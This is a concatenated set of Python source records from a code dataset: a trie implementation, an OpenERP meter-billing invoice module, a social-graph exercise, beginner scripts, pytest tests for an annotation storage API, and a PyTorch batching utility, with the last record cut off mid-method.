+{"seq_id":"280436493","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    Description: a trie (prefix tree / dictionary tree) uses shared string prefixes to cut search time; lookup is O(n),\n                 where n is the length of the input string\n\n    Core idea: trade space for time.\n    Typical use: counting and sorting large numbers of strings (though not limited to strings); it minimizes needless string comparisons, so lookups are faster than with a hash table.\n\n    Basic properties:\n    - The root node holds no character; every other node holds exactly one character or string\n    - Concatenating the characters along the path from the root to a node yields that node's string\n    - The children of a given node all hold distinct characters\n\n    In essence, a trie is a tree that stores many strings.\n\n\n    From tries to suffix trees: https://blog.csdn.net/v_july_v/article/details/6897097\n\n\"\"\"\n\n\n# node with a custom child-pointer map\nclass TrieNode:\n    def __init__(self):\n        self.nodes = dict()  # child dictionary\n        self.is_leaf = False\n\n\nclass Trie(object):\n    def __init__(self):\n        self.root = TrieNode()\n\n    def insert(self, word: str):\n        current = self.root\n        for char in word:\n            if char not in current.nodes:\n                current.nodes[char] = TrieNode()\n            current = current.nodes[char]\n        current.is_leaf = True\n\n    def insert_many(self, words: [str]):\n        for word in words:\n            self.insert(word)\n\n    def search_exact(self, word: str):\n        \"\"\"exact-match lookup\"\"\"\n        current = self.root\n        for char in word:\n            if current.nodes.get(char) is None:\n                return False\n            else:\n                print(char)\n                current = current.nodes[char]\n        return current.is_leaf\n\n    def search_fuzzy(self, word: str):\n        \"\"\"prefix (fuzzy) lookup\"\"\"\n        current = self.root\n        for char in word:\n            if current.nodes.get(char) is None:\n                return False\n            else:\n                print(char)\n                if current.nodes[char].is_leaf:\n                    return True\n                else:\n                    current = current.nodes[char]\n        return True\n\n\nif __name__ == '__main__':\n    tr = Trie()\n    tr.insert(\"child\")\n    ret = tr.search_exact(\"child\")\n    print(ret)\n\n    ret = tr.search_fuzzy(\"children\")\n    print(ret)\n","sub_path":"Data_Structures-and-Algorithm/data_structure_code/trie/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"522876596","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n#    OpenERP, Open Source Management Solution\n#    Copyright (C) 2004-2010 Tiny SPRL ().\n#\n#    This program is free software: you can redistribute it and/or modify\n#    it under the terms of the GNU Affero General Public License as\n#    published by the Free Software Foundation, either version 3 of the\n#    License, or (at your option) any later version.\n#\n#    This program is distributed in the hope that it will be useful,\n#    but WITHOUT ANY WARRANTY; without even the implied warranty of\n#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n#    GNU Affero General Public License for more details.\n#\n#    You should have received a copy of the GNU Affero General Public License\n#    along with this program.
If not, see .\n#\n##############################################################################\n# Generated by the OpenERP plugin for Dia !\nfrom osv import fields,osv\n\nclass account_invoice(osv.osv):\n \"\"\"Facturation avec notion d'index de lecture de compteur.\"\"\"\n _inherit = 'account.invoice'\n _columns = {\n 'index_start': fields.float('Index Debut'),\n 'index_end': fields.float('Index fin'),\n 'index_start_elec': fields.float('Index Electricite Debut'),\n 'index_end_elec': fields.float('Index Electricite fin'),\n 'room_area': fields.float('Surface Appartement', help='Surface attribue au client'),\n 'global_bill_water': fields.float('Facture Globale Eau', help='Montant de la facture a repartir'),\n 'global_bill_elec': fields.float('Facture Globale Electricite', help='Montant de la facture a repartir'),\n 'global_bill_elec_qty':fields.float('Qte Globale Electricite', help='Montant de la consommation a repartir'),\n 'building_area': fields.float('Surface Batiment'),\n 'consommation':fields.float('Consommation Eau Calcule'),\n 'total_building_area': fields.float('Surface Enceinte'),\n \n }\n def index_change(self, cr, uid, ids,context=None):\n invoice_line_obj=self.pool.get('account.invoice.line')\n invoice_obj=self.pool.get('account.invoice')\n for invoice in self.browse(cr,uid,ids):\n for line in invoice.invoice_line:\n if line.product_id.name=='Consommation':\n if line.type=='ele':\n quantity=invoice.index_end_elec-invoice.index_start_elec\n pu=invoice.global_bill_elec/invoice.global_bill_elec_qty\n val={'quantity':quantity,'price_unit':pu}\n else:\n quantity=invoice.index_end-invoice.index_start\n val={'quantity':quantity}\n inv_qty=quantity\n else:\n if line.type=='eau':\n quantity=invoice.index_end-invoice.index_start\n if line.product_id.name=='Redevance':\n quantity=1\n pu=invoice.global_bill_water/invoice.building_area*invoice.room_area\n val={'quantity':quantity,'price_unit':pu}\n else:\n val={'quantity':quantity}\n else:\n quantity=invoice.index_end_elec-invoice.index_start_elec\n if line.base:\n pu=line.base/invoice.total_building_area*invoice.room_area\n quantity=1\n val={'quantity':quantity,'price_unit':pu}\n invoice_line_obj.write(cr,uid,line.id,val)\n invoice_obj.write(cr,uid,invoice.id,{'consommation':inv_qty})\n invoice.button_reset_taxes()\n return True\naccount_invoice()\n\nclass account_invoice_line(osv.osv):\n \"\"\"Facturation avec notion d'index de lecture de compteur.\"\"\"\n _inherit = 'account.invoice.line'\n _columns = {\n 'type':fields.selection((('eau','Eau'),('ele','Electricite')),'Type'),\n 'base':fields.float('Base de calcul'),\n }\n\naccount_invoice_line()\n","sub_path":"extra-addons/account_invoice_surface_index/account_invoice_surface_index.py","file_name":"account_invoice_surface_index.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"242255601","text":"import random\nimport time\nimport sys\nsys.path.append('../graph')\nfrom util import Queue\n\n\nclass User:\n def __init__(self, name):\n self.name = name\n\n\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n # print(\"WARNING: You cannot be friends with yourself\")\n return False\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n # print(\"WARNING: Friendship already 
exists\")\n return False\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n return True\n\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n\n def populate_graph(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n # !!!! IMPLEMENT ME\n\n # Add users\n # Write a for loop that calls create user the right amount of times\n for i in range(num_users):\n self.add_user(f\"User {i + 1}\")\n\n # Create friendships\n # To create N random friendships, you could create a list with all\n # possible friendship combinations, shuffle the list, then grab the\n # first N elements from the list.\n possible_friendships = []\n for user_id in self.users:\n for friend_id in range(user_id + 1, self.last_id + 1):\n possible_friendships.append((user_id, friend_id))\n\n random.shuffle(possible_friendships)\n\n # Create N friendships where N = avg_friendships * num_users // 2\n # avg_friendships = total_friendships / num_users\n # total_friendships = avg_friendships * num_users\n for i in range(num_users * avg_friendships // 2):\n friendship = possible_friendships[i]\n self.add_friendship(friendship[0], friendship[1])\n\n def populate_graph_linear(self, num_users, avg_friendships):\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n # Add users\n # Write a for loop that calls create user the right amount of times\n for i in range(num_users):\n self.add_user(f\"User {i+1}\")\n\n target_friendships = num_users * avg_friendships\n total_friendships = 0\n collisions = 0\n while total_friendships < target_friendships:\n # Pick a random user\n user_id = random.randint(1, num_users)\n # Pick another random user\n friend_id = random.randint(1, num_users)\n # Try to create the friendship\n if self.add_friendship(user_id, friend_id):\n # If it works, increment a counter\n total_friendships += 2\n else:\n # If not, try again\n collisions += 1\n print(f\"NUM COLLISIONS: {collisions}\")\n\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n\n The key is the friend's ID and the value is the path.\n \"\"\"\n visited = {} # Note that this is a dictionary, not a set\n # !!!! 
IMPLEMENT ME\n\n # QUEUE\n # Create a queue\n q = Queue()\n # Enqueue A PATH TO the starting vertex\n q.enqueue([user_id])\n # While the queue is not empty...\n while q.size() > 0:\n # Dequeue the first PATH\n path = q.dequeue()\n # GRAB THE LAST ID FROM THE END OF THE PATH\n last_id = path[-1]\n # Check if it's been visited\n # If it hasn't been visited...\n if last_id not in visited:\n # Mark it as visited\n visited[last_id] = path\n # Enqueue all it's neighbors to back of the queue\n for friend_id in self.friendships[last_id]:\n # MAKE A COPY OF THE PATH\n copy = path.copy()\n # ADD NEIGHBOR TO BACK OF PATH\n copy.append(friend_id)\n # ENQUEUE THE COPY\n q.enqueue(copy)\n return visited\n\n\n# 1. To create 100 users with an average of 10 friends each, how many\n# times would you need to call `add_friendship()`? Why?\n#\n# A: 100 * 10 // 2 = 500\n\n# 2. If you create 1000 users with an average of 5 random friends\n# each, what percentage of other users will be in a particular\n# user's extended social network?\n#\n# A: Running a test of:\n# sg = SocialGraph()\n# sg.populate_graph(1000, 5)\n# connections = sg.get_all_social_paths(1)\n# print(len(connections) / 1000)\n#\n# Answer = 0.99\n#\n# What is the average degree of separation between a user and\n# those in his/her extended network?\n#\n# A: Running a test of:\n# sg = SocialGraph()\n# sg.populate_graph(1000, 5)\n# connections = sg.get_all_social_paths(1)\n# print(len(connections) / 1000)\n# total = 0\n# for path in connections.values():\n# total += len(path)\n# print(f\"Avg degrees of separation = {total / len(connections) - 1}\")\n#\n# Answer = ~4.5\n\n# 3. You might have found the results from question #2 above to be\n# surprising. Would you expect results like this in real life?\n#\n# A: No.\n#\n# If not, what are some ways you could improve your friendship\n# distribution model for more realistic results?\n#\n# A: Use a Voronoi algorithm that accounts for clustering.\n\n# 4. If you followed the hints for part 1, your `populate_graph()` will\n# run in O(n^2) time. Refactor your code to run in O(n) time. 
Are\n# there any tradeoffs that come with this implementation?\n#\n# A: After a certain density, Linear Populate takes much longer\n# to populate because of collisions.\n\n\nif __name__ == '__main__':\n # sg = SocialGraph()\n # sg.populate_graph(10, 2)\n # print(sg.friendships)\n # connections = sg.get_all_social_paths(1)\n # print(connections)\n\n num_users = 2000\n avg_friendships = 400\n sg = SocialGraph()\n start_time = time.time()\n sg.populate_graph(num_users, avg_friendships)\n end_time = time.time()\n print(\"\\n\\n-----\")\n print(f\"Quadratic populate: {end_time - start_time} seconds\")\n print(\"-----\\n\\n\")\n\n sg = SocialGraph()\n start_time = time.time()\n sg.populate_graph_linear(num_users, avg_friendships)\n end_time = time.time()\n print(f\"Linear populate: {end_time - start_time} seconds\")\n","sub_path":"projects/social/social.py","file_name":"social.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"202783077","text":"#Multiple If statements in Succession\n\nprint(\"Welcome to the RollerCoster Ride\")\n\nheight = float(input(\"Please enter your height in cm: \"))\nbill_amount = 0\n\nif height >= 120:\n print(\"You are eligible for the ride\")\n age = int(input(\"Enter your age: \"))\n if age < 12:\n bill = 10\n print(\"You require a Child fee of RS 10\")\n elif age <=18:\n bill = 20\n print(\"You require a Teenage fee of RS 20\")\n else:\n bill = 30\n print(\"You require an Adult fee of RS 30\")\n \n require_photos = input(\"Please say 'Y' if you need the photos or else please mention 'N': \")\n if require_photos == \"Y\":\n bill +=3\n\n print(f\"Your final bill is {bill}\")\n\nelse:\n print(\"You are not eligible for the ride\")\n","sub_path":"day_3-5.py","file_name":"day_3-5.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"334920407","text":"# ------------------------------------\n# Dictionary comprehension\n# { arg : arg for arg in arg}\n#\n# - iterates over keys by default\n# - to iterate over keys and values use .items()\n# ------------------------------------\n\n# example 1\n\nnumbers = dict(first=1, second=2, third=3)\n\nsquared_numbers = {key: value ** 2 for key,value in numbers.items()}\n\nprint(squared_numbers) # {'first': 1, 'second': 4, 'third': 9}\n\n# example 2\n{num: num**2 for num in [1,2,3,4,5]}\n\n# example 3\nstr1 = \"ABC\"\nstr2 = \"123\"\ncombo = {str1[i]: str2[i] for i in range(0,len(str1))}\nprint(combo) # {'A': '1', 'B': '2', 'C': '3'}","sub_path":"notes/dictcomp.py","file_name":"dictcomp.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"58726548","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport copy\n\nimport pytest\nimport mock\nfrom mock import patch\nfrom pyramid.testing import DummyRequest\n\nfrom h import db\nfrom h.api import storage\nfrom h.api import schemas\nfrom h.api.models.annotation import Annotation\nfrom h.api.models.document import Document, DocumentURI\n\n\nclass TestFetchAnnotation(object):\n\n def test_elastic(self, postgres_enabled, models):\n postgres_enabled.return_value = False\n models.elastic.Annotation.fetch.return_value = mock.Mock()\n\n actual = storage.fetch_annotation(DummyRequest(), '123')\n\n models.elastic.Annotation.fetch.assert_called_once_with('123')\n assert 
models.elastic.Annotation.fetch.return_value == actual\n\n def test_postgres(self, postgres_enabled):\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = True\n\n annotation = Annotation(userid='luke')\n db.Session.add(annotation)\n db.Session.flush()\n\n actual = storage.fetch_annotation(request, annotation.id)\n assert annotation == actual\n\n def test_it_uses_postgres_if_postgres_arg_is_True(self, postgres_enabled):\n \"\"\"If postgres=True it uses postgres even if feature flag is off.\"\"\"\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = False # The feature flag is off.\n annotation = Annotation(userid='luke')\n db.Session.add(annotation)\n db.Session.flush()\n\n actual = storage.fetch_annotation(\n request, annotation.id, _postgres=True)\n\n assert annotation == actual\n\n def test_it_uses_elastic_if_postgres_arg_is_False(self,\n postgres_enabled,\n models):\n \"\"\"If postgres=False it uses elastic even if the feature flag is on.\"\"\"\n postgres_enabled.return_value = True # The feature flag is on.\n models.elastic.Annotation.fetch.return_value = mock.Mock()\n\n actual = storage.fetch_annotation(\n DummyRequest(), '123', _postgres=False)\n\n models.elastic.Annotation.fetch.assert_called_once_with('123')\n assert models.elastic.Annotation.fetch.return_value == actual\n\n\nclass TestExpandURI(object):\n\n def test_expand_uri_postgres_no_document(self, postgres_enabled):\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = True\n\n actual = storage.expand_uri(request, 'http://example.com/')\n assert actual == ['http://example.com/']\n\n def test_expand_uri_elastic_no_document(self, postgres_enabled, models):\n postgres_enabled.return_value = False\n request = DummyRequest()\n models.elastic.Document.get_by_uri.return_value = None\n assert storage.expand_uri(request, \"http://example.com/\") == [\n \"http://example.com/\"]\n\n def test_expand_uri_postgres_document_doesnt_expand_canonical_uris(\n self,\n postgres_enabled):\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = True\n\n document = Document(document_uris=[\n DocumentURI(uri='http://foo.com/', claimant='http://example.com'),\n DocumentURI(uri='http://bar.com/', claimant='http://example.com'),\n DocumentURI(uri='http://example.com/', type='rel-canonical',\n claimant='http://example.com'),\n ])\n db.Session.add(document)\n db.Session.flush()\n\n assert storage.expand_uri(request, \"http://example.com/\") == [\n \"http://example.com/\"]\n\n def test_expand_uri_elastic_document_doesnt_expand_canonical_uris(\n self,\n postgres_enabled,\n models):\n postgres_enabled.return_value = False\n\n request = DummyRequest()\n document = models.elastic.Document.get_by_uri.return_value\n type(document).document_uris = uris = mock.PropertyMock()\n uris.return_value = [\n mock.Mock(uri='http://foo.com/'),\n mock.Mock(uri='http://bar.com/'),\n mock.Mock(uri='http://example.com/', type='rel-canonical'),\n ]\n assert storage.expand_uri(request, \"http://example.com/\") == [\n \"http://example.com/\"]\n\n def test_expand_uri_postgres_document_uris(self, postgres_enabled):\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = True\n\n document = Document(document_uris=[\n DocumentURI(uri='http://foo.com/', claimant='http://bar.com'),\n DocumentURI(uri='http://bar.com/', claimant='http://bar.com'),\n ])\n db.Session.add(document)\n db.Session.flush()\n\n assert storage.expand_uri(request, 'http://foo.com/') == [\n 'http://foo.com/',\n 
'http://bar.com/'\n ]\n\n def test_expand_uri_elastic_document_uris(self, postgres_enabled, models):\n postgres_enabled.return_value = False\n request = DummyRequest()\n document = models.elastic.Document.get_by_uri.return_value\n type(document).document_uris = uris = mock.PropertyMock()\n uris.return_value = [\n mock.Mock(uri=\"http://foo.com/\"),\n mock.Mock(uri=\"http://bar.com/\"),\n ]\n assert storage.expand_uri(request, \"http://example.com/\") == [\n \"http://foo.com/\",\n \"http://bar.com/\",\n ]\n\n\n@pytest.mark.usefixtures('AnnotationBeforeSaveEvent',\n 'models', # Don't try to talk to real Elasticsearch!\n 'partial',\n 'transform')\nclass TestLegacyCreateAnnotation(object):\n\n def test_it_inits_an_elastic_annotation_model(self, models):\n data = self.annotation_data()\n\n storage.legacy_create_annotation(self.mock_request(), data)\n\n models.elastic.Annotation.assert_called_once_with(data)\n\n def test_it_calls_partial(self, partial):\n request = self.mock_request()\n\n storage.legacy_create_annotation(request, self.annotation_data())\n\n partial.assert_called_once_with(\n storage.fetch_annotation, request, _postgres=False)\n\n def test_it_calls_prepare(self, models, partial, transform):\n storage.legacy_create_annotation(self.mock_request(),\n self.annotation_data())\n transform.prepare.assert_called_once_with(\n models.elastic.Annotation.return_value, partial.return_value)\n\n def test_it_inits_AnnotationBeforeSaveEvent(self,\n AnnotationBeforeSaveEvent,\n models):\n request = self.mock_request()\n\n storage.legacy_create_annotation(request, self.annotation_data())\n\n AnnotationBeforeSaveEvent.assert_called_once_with(\n request, models.elastic.Annotation.return_value)\n\n def test_it_calls_notify(self, AnnotationBeforeSaveEvent):\n request = self.mock_request()\n\n storage.legacy_create_annotation(request, self.annotation_data())\n\n request.registry.notify.assert_called_once_with(\n AnnotationBeforeSaveEvent.return_value)\n\n def test_it_calls_annotation_save(self, models):\n storage.legacy_create_annotation(self.mock_request(),\n self.annotation_data())\n\n models.elastic.Annotation.return_value.save.assert_called_once_with()\n\n def test_it_returns_the_annotation(self, models):\n result = storage.legacy_create_annotation(self.mock_request(),\n self.annotation_data())\n\n assert result == models.elastic.Annotation.return_value\n\n def mock_request(self):\n request = DummyRequest(feature=mock.Mock(spec=lambda feature: False,\n return_value=False))\n request.registry.notify = mock.Mock(spec=lambda event: None)\n return request\n\n def annotation_data(self):\n return {'foo': 'bar'}\n\n @pytest.fixture\n def AnnotationBeforeSaveEvent(self, request):\n patcher = patch('h.api.storage.AnnotationBeforeSaveEvent',\n autospec=True)\n AnnotationBeforeSaveEvent = patcher.start()\n request.addfinalizer(patcher.stop)\n return AnnotationBeforeSaveEvent\n\n @pytest.fixture\n def partial(self, request):\n patcher = patch('h.api.storage.partial', autospec=True)\n partial = patcher.start()\n request.addfinalizer(patcher.stop)\n return partial\n\n @pytest.fixture\n def transform(self, request):\n patcher = patch('h.api.storage.transform', autospec=True)\n transform = patcher.start()\n request.addfinalizer(patcher.stop)\n return transform\n\n\n@pytest.mark.usefixtures('fetch_annotation',\n 'models')\nclass TestCreateAnnotation(object):\n\n def test_it_fetches_parent_annotation_for_replies(self,\n authn_policy,\n fetch_annotation):\n request = self.mock_request()\n\n # Make the annotation's 
parent belong to 'test-group'.\n fetch_annotation.return_value.groupid = 'test-group'\n\n # The request will need permission to write to 'test-group'.\n authn_policy.effective_principals.return_value = ['group:test-group']\n\n data = self.annotation_data()\n\n # The annotation is a reply.\n data['references'] = ['parent_annotation_id']\n\n storage.create_annotation(request, data)\n\n fetch_annotation.assert_called_once_with(request,\n 'parent_annotation_id',\n _postgres=True)\n\n def test_it_sets_group_for_replies(self,\n authn_policy,\n fetch_annotation,\n models):\n # Make the annotation's parent belong to 'test-group'.\n fetch_annotation.return_value.groupid = 'test-group'\n\n # The request will need permission to write to 'test-group'.\n authn_policy.effective_principals.return_value = ['group:test-group']\n\n data = self.annotation_data()\n assert data['groupid'] != 'test-group'\n\n # The annotation is a reply.\n data['references'] = ['parent_annotation_id']\n\n storage.create_annotation(self.mock_request(), data)\n\n assert models.Annotation.call_args[1]['groupid'] == 'test-group'\n\n def test_it_raises_if_parent_annotation_does_not_exist(self,\n fetch_annotation):\n fetch_annotation.return_value = None\n\n data = self.annotation_data()\n\n # The annotation is a reply.\n data['references'] = ['parent_annotation_id']\n\n with pytest.raises(schemas.ValidationError) as err:\n storage.create_annotation(self.mock_request(), data)\n\n assert str(err.value).startswith('references.0: ')\n\n def test_it_raises_if_user_does_not_have_permissions_for_group(self):\n data = self.annotation_data()\n data['groupid'] = 'foo-group'\n\n with pytest.raises(schemas.ValidationError) as err:\n storage.create_annotation(self.mock_request(), data)\n\n assert str(err.value).startswith('group: ')\n\n def test_it_inits_an_Annotation_model(self, models):\n data = self.annotation_data()\n\n storage.create_annotation(self.mock_request(), copy.deepcopy(data))\n\n del data['document']\n models.Annotation.assert_called_once_with(**data)\n\n def test_it_adds_the_annotation_to_the_database(self, models):\n request = self.mock_request()\n\n storage.create_annotation(request, self.annotation_data())\n\n request.db.add.assert_called_once_with(models.Annotation.return_value)\n\n def test_it_calls_find_or_create_by_uris(self, models):\n request = self.mock_request()\n annotation = models.Annotation.return_value\n annotation_data = self.annotation_data()\n annotation_data['document']['document_uri_dicts'] = [\n {\n 'uri': 'http://example.com/example_1',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n {\n 'uri': 'http://example.com/example_2',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n {\n 'uri': 'http://example.com/example_3',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n ]\n\n storage.create_annotation(request, annotation_data)\n\n models.Document.find_or_create_by_uris.assert_called_once_with(\n request.db,\n annotation.target_uri,\n [\n 'http://example.com/example_1',\n 'http://example.com/example_2',\n 'http://example.com/example_3',\n ],\n created=annotation.created,\n updated=annotation.updated,\n )\n\n def test_it_calls_merge_documents(self, models):\n \"\"\"If it finds more than one document it calls merge_documents().\"\"\"\n models.Document.find_or_create_by_uris.return_value = mock.Mock(\n count=mock.Mock(return_value=3))\n request = self.mock_request()\n\n 
storage.create_annotation(request, self.annotation_data())\n\n models.merge_documents.assert_called_once_with(\n request.db,\n models.Document.find_or_create_by_uris.return_value,\n updated=models.Annotation.return_value.updated,\n )\n\n def test_it_calls_first(self, models):\n \"\"\"If it finds only one document it calls first().\"\"\"\n models.Document.find_or_create_by_uris.return_value = mock.Mock(\n count=mock.Mock(return_value=1))\n\n storage.create_annotation(self.mock_request(), self.annotation_data())\n\n models.Document.find_or_create_by_uris.return_value\\\n .first.assert_called_once_with()\n\n def test_it_updates_document_updated(self, models):\n yesterday = \"yesterday\"\n document = models.merge_documents.return_value = mock.Mock(\n updated=yesterday)\n models.Document.find_or_create_by_uris.return_value.first\\\n .return_value = document\n\n storage.create_annotation(self.mock_request(), self.annotation_data())\n\n assert document.updated == models.Annotation.return_value.updated\n\n def test_it_calls_create_or_update_document_uri(\n self,\n models):\n models.Document.find_or_create_by_uris.return_value.count\\\n .return_value = 1\n\n request = self.mock_request()\n\n annotation = models.Annotation.return_value\n\n annotation_data = self.annotation_data()\n annotation_data['document']['document_uri_dicts'] = [\n {\n 'uri': 'http://example.com/example_1',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n {\n 'uri': 'http://example.com/example_2',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n {\n 'uri': 'http://example.com/example_3',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n ]\n\n storage.create_annotation(request, copy.deepcopy(annotation_data))\n\n assert models.create_or_update_document_uri.call_count == 3\n for doc_uri_dict in annotation_data['document']['document_uri_dicts']:\n models.create_or_update_document_uri.assert_any_call(\n session=request.db,\n document=models.Document.find_or_create_by_uris.return_value.first.return_value,\n created=annotation.created,\n updated=annotation.updated,\n **doc_uri_dict\n )\n\n def test_it_calls_create_or_update_document_meta(self, models):\n models.Document.find_or_create_by_uris.return_value.count\\\n .return_value = 1\n\n request = self.mock_request()\n\n annotation = models.Annotation.return_value\n\n annotation_data = self.annotation_data()\n annotation_data['document']['document_meta_dicts'] = [\n {\n 'claimant': 'http://example.com/claimant',\n 'claimant_normalized':\n 'http://example.com/claimant_normalized',\n 'type': 'title',\n 'value': 'foo',\n },\n {\n 'type': 'article title',\n 'claimant_normalized':\n 'http://example.com/claimant_normalized',\n 'value': 'bar',\n 'claimant': 'http://example.com/claimant',\n },\n {\n 'type': 'site title',\n 'claimant_normalized':\n 'http://example.com/claimant_normalized',\n 'value': 'gar',\n 'claimant': 'http://example.com/claimant',\n },\n ]\n\n storage.create_annotation(request, copy.deepcopy(annotation_data))\n\n assert models.create_or_update_document_meta.call_count == 3\n for document_meta_dict in annotation_data['document'][\n 'document_meta_dicts']:\n models.create_or_update_document_meta.assert_any_call(\n session=request.db,\n document=models.Document.find_or_create_by_uris.return_value.first.return_value,\n created=annotation.created,\n updated=annotation.updated,\n **document_meta_dict\n )\n\n def 
test_it_returns_the_annotation(self, models):\n annotation = storage.create_annotation(self.mock_request(),\n self.annotation_data())\n\n assert annotation == models.Annotation.return_value\n\n def test_it_does_not_crash_if_target_selectors_is_empty(self):\n # Page notes have [] for target_selectors.\n data = self.annotation_data()\n data['target_selectors'] = []\n\n storage.create_annotation(self.mock_request(), data)\n\n def test_it_does_not_crash_if_no_text_or_tags(self):\n # Highlights have no text or tags.\n data = self.annotation_data()\n data['text'] = data['tags'] = ''\n\n storage.create_annotation(self.mock_request(), data)\n\n def mock_request(self):\n request = DummyRequest(\n feature=mock.Mock(\n side_effect=lambda flag: flag == \"postgres_write\"),\n authenticated_userid='acct:test@localhost'\n )\n\n request.registry.notify = mock.Mock(spec=lambda event: None)\n\n class DBSpec(object):\n def add(self, annotation):\n pass\n def flush():\n pass\n request.db = mock.Mock(spec=DBSpec)\n\n return request\n\n def annotation_data(self):\n return {\n 'userid': 'acct:test@localhost',\n 'text': 'text',\n 'tags': ['one', 'two'],\n 'shared': False,\n 'target_uri': 'http://www.example.com/example.html',\n 'groupid': '__world__',\n 'references': [],\n 'target_selectors': ['selector_one', 'selector_two'],\n 'document': {\n 'document_uri_dicts': [],\n 'document_meta_dicts': [],\n }\n }\n\n @pytest.fixture\n def fetch_annotation(self, request):\n patcher = patch('h.api.storage.fetch_annotation', autospec=True)\n fetch_annotation = patcher.start()\n request.addfinalizer(patcher.stop)\n return fetch_annotation\n\n\n@pytest.fixture\ndef document_model(config, request):\n patcher = patch('h.api.models.elastic.Document', autospec=True)\n module = patcher.start()\n request.addfinalizer(patcher.stop)\n return module\n\n\n@pytest.fixture\ndef models(request):\n patcher = patch('h.api.storage.models')\n models = patcher.start()\n models.Annotation.return_value.is_reply = False\n request.addfinalizer(patcher.stop)\n return models\n\n\n@pytest.fixture\ndef postgres_enabled(request):\n patcher = patch('h.api.storage._postgres_enabled', autospec=True)\n func = patcher.start()\n request.addfinalizer(patcher.stop)\n return func\n","sub_path":"h/api/test/storage_test.py","file_name":"storage_test.py","file_ext":"py","file_size_in_byte":20751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"8563850","text":"from pathlib import Path\nfrom collections import defaultdict\nfrom pprint import pprint\nimport random\n\nimport numpy as np\nimport torch\nfrom torch import nn, optim, tensor\n\nfrom .iters import flatten\n\n\nclass TensorBatcher():\n \"\"\"Simple combination of a TensorDataset and a DataLoader, but\n faster due to less overhead.\"\"\"\n def __init__(\n self, X, Y=None, *, batch_size=64, shuffle=True):\n self.X = X\n if Y is not None:\n assert X.size(0) == Y.size(0)\n self.Y = Y\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def __iter__(self):\n if self.shuffle:\n get_idxs = torch.randperm\n else:\n get_idxs = torch.arange\n b_idxs = get_idxs(self.X.size(0)).to(self.X.device)\n if self.Y is not None:\n assert self.X.device == self.Y.device\n yield from zip(\n self.X[b_idxs].split(self.batch_size),\n self.Y[b_idxs].split(self.batch_size))\n else:\n yield from self.X[b_idxs].split(self.batch_size)\n\n def __len__(self):\n return (self.X.size(0) - 1) // self.batch_size + 1\n\n\nclass LengthBatcher():\n \"\"\"Splits variable-length instances 
in X and Y into batches,\n according to their length. Instances in a batch have the same length,\n as determined by get_len. Instances in different batches may have\n different lengths.\"\"\"\n\n def __init__(\n self, X, Y=None, batch_size=100,\n get_len=lambda x: x[1] - x[0], keys=None,\n start_ends=False, log=None):\n self.X = X\n self.Y = Y\n self.device = self.X.device\n if self.Y is not None:\n assert self.X.device == self.Y.device\n self.batch_size = batch_size\n if start_ends:\n keys = X[:, 1] - X[:, 0]\n if keys is None:\n len2idxs = defaultdict(list)\n for idx in range(len(X)):\n len2idxs[get_len(X[idx])].append(idx)\n self.len2idxs = {\n l: tensor(idxs, dtype=torch.int64, device=self.device)\n for l, idxs in len2idxs.items()}\n self.lengths = np.array(list(self.len2idxs.keys()))\n self.multilen = self.lengths.ndim > 1\n else:\n self.lengths = list(set(keys.cpu().tolist()))\n self.len2idxs = {\n l: torch.nonzero(keys == l).squeeze()\n for l in self.lengths}\n self.multilen = False\n if log:\n log.info(f\"{len(self)} batches. batch size: {self.batch_size}\")\n\n def __iter__(self):\n if self.Y is not None:\n if self.multilen:\n raise NotImplementedError\n else:\n yield from self.iter_XY()\n else:\n if self.multilen:\n yield from self.iter_X_multi()\n else:\n yield from self.iter_X()\n\n def __len__(self):\n return sum(\n len(idxs.split(self.batch_size))\n for idxs in self.len2idxs.values())\n\n def iter_XY(self):\n 